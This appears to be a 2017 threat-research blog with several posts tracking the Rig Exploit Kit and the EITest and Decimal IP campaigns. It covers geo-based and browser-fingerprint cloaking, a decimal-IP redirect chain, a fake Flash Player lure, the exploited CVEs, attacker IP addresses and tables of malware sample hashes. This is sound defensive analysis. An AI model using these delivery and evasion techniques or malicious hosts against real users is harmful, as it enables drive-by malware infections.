2017年5月25日木曜日

New EITest's Cloaking

First

(In the case of JST) EITest has been observed again since last night, but many researchers say that they can not observe it. In conclusion, It seems that EITest this time is targeting only some Asian countries including Japan.

Experiment

I accessed EITest 's Compromised site using IP from various countries, and the results are as follows.

Japan



HongKong



UK



America



Netherlands



Singapore



Finally

I found out that there were three types of EITest inject codes. They are switched with Geo. I don't know the details, but UK and America seem to be redirected to a different place from RigEK. It seems that only some Asian countries, such as Japan and Hong Kong, are redirecting to RigEK.

2017年5月24日水曜日

Analyzing Rig Exploit Kit vol.3

First

Although I introduced RigEK's behavior several times so far, I will introduce about various changes. Please refer to those who do not know the previous RigEK.

https://github.com/nao-sec/RigEK/blob/master/README-en.md

Step 0

The beginning of this incident was @BroadAnalysis tweet.

EITest was again observed.

Rig Exploit Kit via EiTest campaign from 109.234.36.68 delivers Mole ransomware

I have not observed EITest since April 28. It has been observed again, please see the blog of @Broad Analysis for specific traffic.

What I will introduce this time is about the change in RigEK's behavior. I have been continuously observing Decimal IP and Seamless but they have been unable to observe from several days ago. It seems that RigEK was changing while I could not observe them.

Step 1

The beginning is nostalgic EITest's code.



The inject code of EITest dynamically generates an iframe and redirects it to RigEK. Previously, I returned a landing page containing JavaScript that was obfuscated by this redirect to the user, but now it is different.



Let's follow the process.

Step 2

This html is fired from the iframe of line 12. When the iframe is loaded, the onload event fires and start() is called. start() is as follows.



Call getBrowser() and check the user's fingerprint. Let's see getBrowser().



RigEK uses the information obtained in this way to check whether the user is the target environment. If the user does not misrepresent browser information and the browser is IE, a form tag is created and redirected to the next stage by HTTP POST method.

Step 3

After that, it is the same as before.The html which contains the obfuscated JavaScript is loaded, attacks which attack some kind of vulnerability are done.The exploit code used seems not to change in particular.

Finally

In this way, RigEK has changed to use POST request.This process is not uncommon, but it shows that RigEK is still evolving.I will continue to track RigEK in the future.

P.S.

Regarding the change of RigEK this time, my mal-getter is already supported :)

https://github.com/nao-sec/mal_getter

2017年5月17日水曜日

Malware dropped by RIG(2017 Feb-Apr)

These are malware that I drop on RIG which I observed between February and April.
I do not know how trustworthy it is, but some malware is compiled just before tampering.
Some families have older compile times.

EITest

familyfound_time(JST)compile timetweetVirus TotalHybrid Analysisreference
Dreambot2017/02/23 8:112017:02:23 01:44:03+01:00https://twitter.com/nao_sec/status/834574645848272897https://www.virustotal.com/en-gb/file/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13a/analysis/https://www.hybrid-analysis.com/sample/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13ahttp://www.malware-traffic-analysis.net/2017/02/23/index.html
Ursnif2017/02/27 (2017/02/25 5:26)2017:02:26 06:20:43+01:00https://twitter.com/nao_sec/status/835681676185382912https://www.virustotal.com/en-gb/file/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5/analysis/https://www.hybrid-analysis.com/sample/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5http://www.malware-traffic-analysis.net/2017/02/27/index.html
CryptoShield2017/02/27 1:222017:02:28 11:32:32+01:00https://twitter.com/nao_sec/status/835889445735817217https://www.virustotal.com/en-gb/file/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946/analysis/https://www.hybrid-analysis.com/sample/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946http://www.malware-traffic-analysis.net/2017/02/28/index.html
Cerber2017/03/18 3:072014:09:11 08:28:00+01:00https://www.virustotal.com/en-gb/file/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264/analysis/https://www.hybrid-analysis.com/sample/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264http://www.malware-traffic-analysis.net/2017/03/20/index.html
Spora matrix2017/04/06 11:112012:07:26 15:06:56+01:00 2014:09:11 08:28:00+01:00https://www.virustotal.com/en-gb/file/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aeb/analysis/https://www.hybrid-analysis.com/sample/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aebhttp://www.malware-traffic-analysis.net/2017/04/07/index.html
matrix2017/04/082017:04:08 04:32:16+01:00https://www.virustotal.com/en-gb/file/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcc/analysis/https://www.hybrid-analysis.com/sample/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcchttp://www.malware-traffic-analysis.net/2017/04/07/index.html
matrix2017/04/082017:04:08 04:32:16+01:00https://www.virustotal.com/en-gb/file/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557/analysis/https://www.hybrid-analysis.com/sample/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557
matrix2017/04/082017:04:08 04:19:19+01:00https://www.virustotal.com/en-gb/file/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47/analysis/https://www.hybrid-analysis.com/sample/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47
QuantLoader Spora2017/04/15 0:582016:03:09 11:15:32+01:00  2015:10:19 04:22:40+01:00https://www.virustotal.com/en-gb/file/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304/analysis/
https://www.virustotal.com/en-gb/file/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1/analysis/
https://www.hybrid-analysis.com/sample/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304https://www.hybrid-analysis.com/sample/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1http://www.malware-traffic-analysis.net/2017/04/15/index.html
QuantLoader Spora2017/04/16(2017/04/05 7:56)2017:02:26 02:21:55+01:00 2021:01:27 12:31:12+01:00https://www.virustotal.com/en-gb/file/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879/analysis/
 https://www.virustotal.com/en-gb/file/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109/analysis/
https://www.hybrid-analysis.com/sample/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879https://www.hybrid-analysis.com/sample/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109http://www.malware-traffic-analysis.net/2017/04/16/index.html
Spora2017/4/18(2017/04/07 22:51:00)2015:10:19 04:22:40+01:00https://twitter.com/nao_sec/status/837500077107113984https://www.virustotal.com/en-gb/file/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11ab/analysis/https://www.hybrid-analysis.com/sample/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11abhttp://malware-traffic-analysis.net/2017/04/18/index.html
mole2017/04/26 10:212017:04:25 20:59:52+01:00https://twitter.com/nao_sec/status/857042029141819393https://www.virustotal.com/en-gb/file/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3/analysis/https://www.hybrid-analysis.com/sample/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3
QuantLoader2017/04/26 13:282017:04:23 15:26:57+01:00https://twitter.com/nao_sec/status/857088936786747392https://www.virustotal.com/en-gb/file/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af/analysis/https://www.hybrid-analysis.com/sample/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af
mole2017/04/27 14:282017:04:26 21:08:06+01:00https://twitter.com/nao_sec/status/857466502840057856https://www.virustotal.com/en-gb/file/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572/analysis/https://www.hybrid-analysis.com/sample/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572
mole2017/04/28 14:402017:04:27 20:36:35+01:00https://twitter.com/nao_sec/status/857831871077470208https://www.virustotal.com/en-gb/file/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36/analysis/https://www.hybrid-analysis.com/sample/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36
mole2017/04/28 22:562017:04:28 11:54:17+01:00https://twitter.com/nao_sec/status/857956617706274816https://www.virustotal.com/en-gb/file/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec/analysis/https://www.hybrid-analysis.com/sample/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec

pseudoDarkleech

familyfound_time(JST)compile timetweetVirus TotalHybrid Analysisreference
Cerber2017/02/22 14:392016:04:03 21:18:59+01:00https://twitter.com/nao_sec/status/834277482446532608https://www.virustotal.com/en-gb/file/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3/analysis/https://www.hybrid-analysis.com/sample/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3http://www.malware-traffic-analysis.net/2017/02/22/index.html
Cerber2017/02/27 0:312016:04:03 21:18:53+01:00https://twitter.com/nao_sec/status/838535748538097665https://www.virustotal.com/en-gb/file/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46ef/analysis/https://www.hybrid-analysis.com/sample/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46efhttp://www.malware-traffic-analysis.net/2017/02/27/index.html
Cerber2017/03/20 1:082014:10:07 05:40:10+01:00https://twitter.com/nao_sec/status/834574488230506496https://www.virustotal.com/en-gb/file/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0d/analysis/https://www.hybrid-analysis.com/sample/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0dhttp://www.malware-traffic-analysis.net/2017/03/20/index2.html

GoodMan

2017年5月8日月曜日

Analyzing Rig Exploit Kit vol.2

First

About 1 month ago I wrote an article "Analyzing Rig Exploit Kit vol.1" but I observed something different from the payload I introduced at that time, so I will introduce about it.

Step 0

About the behavior of RigEK, please read the previous article first, since it is common to Step 4, I will skip this time. In the last time I introduced the one using vulnerability of CVE-2016-0189, CVE-2015-2419, swf (I don't have knowledge of swf, so I omitted it this time).

Analyzing Rig Exploit Kit vol.1

Step 1

As before, as you read the obfuscated RigEK code, 3 payloads will appear.The first one uses the same CVE-2016-0189 as the previous one, the second one as well It is one using swf, and the payload to be introduced this time.It is the following code immediately after canceling obfuscation.

Step 2

The code is VCScript, just a bit of it is similar to CVE-2016-0189, but let's read the code in order.

About the function sdefgfss(), which is written at the beginning, there are strange binaries that are not common, but the one that is rewritten for clarity is the following code.

In VBScript "&" is used for string concatenation, if you have studied about Drive-by Download or Exploit Kit so far, it will be a familiar code.This function is "o32.tmp" which is a function that is executing. The URL drops malware with x-msdownload from RigEK, and key is used to decode the dropped malware with RC4.

Step 3

Next, let's look at the function periphery called Begin(). First They decide from the UserAgent whether the user is 32bit or 64bit. This attack target seems to be a 32bit user, from which meaningless processing Continuing, these are the payload of CVE-2014-6332. Please check the following article for details.
http://malware.dontneedcoffee.com/2014/11/cve-2014-6332.html

CVE-2014-6332 is a vulnerability that is used in many EKs, which was previously incorporated in RigEK, which means that we observed it this time.

Finally

Rig just changed the URL parameter the other day, the payload may also be updated, I will write an article if I observe it.

Have a good analysis day😉

2017年5月2日火曜日

Overlooking Decimal IP Campaign

It was April 26 that I first observed Decimal IP Campaign. At that time, I thought that it was a simple embedded RigEK iframe, but then I read the blog of Zerophage and Malwarebytes and noticed that it is Decimal IP Campaign.

For Decimal IP Campaign, please refer to the blog of Zerophage and Malwarebytes.
https://blog.malwarebytes.com/cybercrime/2017/03/websites-compromised-decimal-ip-campaign/
https://zerophagemalware.com/2017/04/27/rig-ek-via-decimal-redirect-drops-smoke-loader/

It was a few hours ago when I started investigating, but I found three Compromised sites. Since they were very interesting, I write the behavior and features here.

In conclusion, Decimal IP Campaign does two things. The behavior is changed by the browser. Here, I introduce the behavior when accessing with Internet Explorer and Chrome (or FireFox).

For Internet Explorer

Please look at this. The whole flow is like this.

When I access the Compromised site in Internet Explorer, I get a response "301 Moved Permanently". This redirect you to the host http://1755118211. This host is not my typo, it is Decimal IP. It is an unfamiliar format, but it is actually interpreted by the browser.


In this way the user is redirected to http://104.156.250.131. A response of "302 Found" is returned and redirected to http://144.76.195.195/rig.php. The html returned at this time contains an iframe connected to RigEK, and the processing flows to RigEK. RigEK is the same as other Campaign, but the file being dropped always seems to be Smoke Loader.

https://www.hybrid-analysis.com/sample/0f391cb9897dfd4ad91c66a7b17f28df8c82d8ece937a411394a7bee27a6e330?environmentId=100
https://www.virustotal.com/en/file/0f391cb9897dfd4ad91c66a7b17f28df8c82d8ece937a411394a7bee27a6e330/analysis/


For Chrome

Unlike IE, Chrome does not redirect to RigEK. The flow is as follows.


When accessed with Chrome, it is redirected to Decimal IP, same as Internet Explorer. After that, it will be redirected to http://162.220.246.254 instead of http://144.76.195.195/rig.php. In this case, html disguised as "Adobe Flash Player" is displayed and the exe file is downloaded. This file is Smoke Loader.

https://www.hybrid-analysis.com/sample/b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7?environmentId=100
https://www.virustotal.com/en-gb/file/b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7/analysis/


Even if you changed "dl=1" which is the URL parameter of exe to "dl=2", the malware that was dropped was the same.

---

Next, I introduce about cloaking.

Decimal IP Campaign seems to preserve the IP of the user who accessed it. When a user accesses a Compromised site, it sees the user's IP and checks whether you have visited this Compromised site and other Compromised sites before. If the user is not accessing, will do the operation I introduced earlier. Otherwise, it returns a normal page.

Also, the Compromised site is not always redirecting to Decimal IP. It may return a normal page. It is like a Round-Robin, and it may be redirected when accessed several times.

---

That's all I have figured out for a couple of hours. I will also write articles as I know something.

Have a good analysis day😉